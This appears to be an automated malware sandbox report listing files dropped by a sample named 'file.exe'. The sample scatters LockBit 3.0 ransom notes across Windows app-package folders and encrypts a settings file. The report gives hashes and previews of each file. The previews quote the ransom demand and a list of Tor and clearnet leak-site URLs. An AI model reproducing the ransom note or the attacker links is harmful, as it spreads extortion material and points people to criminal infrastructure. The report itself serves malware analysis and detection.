.......n...:.X&..x......(..!l{K...W..$.......3.bY.3h..pWe.=g=:.q..L.Y.y.}1.d....o$S....+.o......zO.L...+.....^.....c...n~.q8.C.....h^.$dGL..v"~.,....s.DF.1o.....a..m......5..y../X.v[.N....:k.u.xB%.`U...(W.]..r].

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.982040331314179
                Encrypted:false
                SSDEEP:192:I+MH5KDRi7emHOaZ51ykFtrIaBd0+VAr0n3hpbUhC1uTdvno:I+jdmlHOu51yKtxxVAraxpU0ATdvo
                MD5:3D5B458FF688F374EF763D346ACCFCD3
                SHA1:E394A59401A49DA576741F707264A936E12B6EC9
                SHA-256:EDB3C9167E34CCDF0C9092809A4599AE522DC5826527581D9B6D4390DAEA8E75
                SHA-512:A8E073E79429CA502BDC6784C7C6BE7DE2F90407A6B193D98CD87C2A22C7F80576AB18F28D6802DA7A51352A3C4726F2C786B48A0B93FFD607327995D5B59877
                Malicious:false
                Preview:.l..=....g..#........w..X[+.,-.ao....>.u.M.....RJ.c&.(.J.t..J.+.X.x....3..#h.....H....<.o.6.xd..0-.'`.1.^...U.'J...G..s.K.)....d...%y........)_Wq.2....p.Q.o.U.n.M..!....m.......z.....8&.D[....%c...v.].aH=j;......#&.(...d.l"..@2.!:*O.z...0.*.r`.a.0.pg..(..H...~G.}.Yj.....!.z..!..D.7.H...8...N<.B%2^M...5.9aRur..jr..~{.W...l.4..l_.b..R....&.....T.... vt.,.:..Q....U5.qW.(.O.+R............n.Es.....[@...c.<..lL..<..U.....j..h.b.!m..sb.".u1....T...<...O...\. O.....Q..l.4.'..8....e.....&...3nOt...$.v....,........{6...W]X.s.0.....% .?.....|......,Z...4g...6..h.(%;..HA`.,=...\.......8T.F...(.Lg..<...Y.Ni.c.........'@..o..i.a.<Ea.}/#)8.....p....}........]3...*I....0....p...+..]p..m`..Asi.......f...,.K2.....QD..V..bx.J.F...."...<E.}..)......:....q.IL.g.'o8.M.THGa599.z..~...}..pV55..3.y.9...'3l.I..RcD....Y.k..........m.l&;.\.:......Qu.5.(.].H.I..s.c...{..v$.)..<.v.$.I...I....:.UB..U.G...P.S...6.W^..U6.k../..........F.4I.....B...U(...pR..`.......X..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
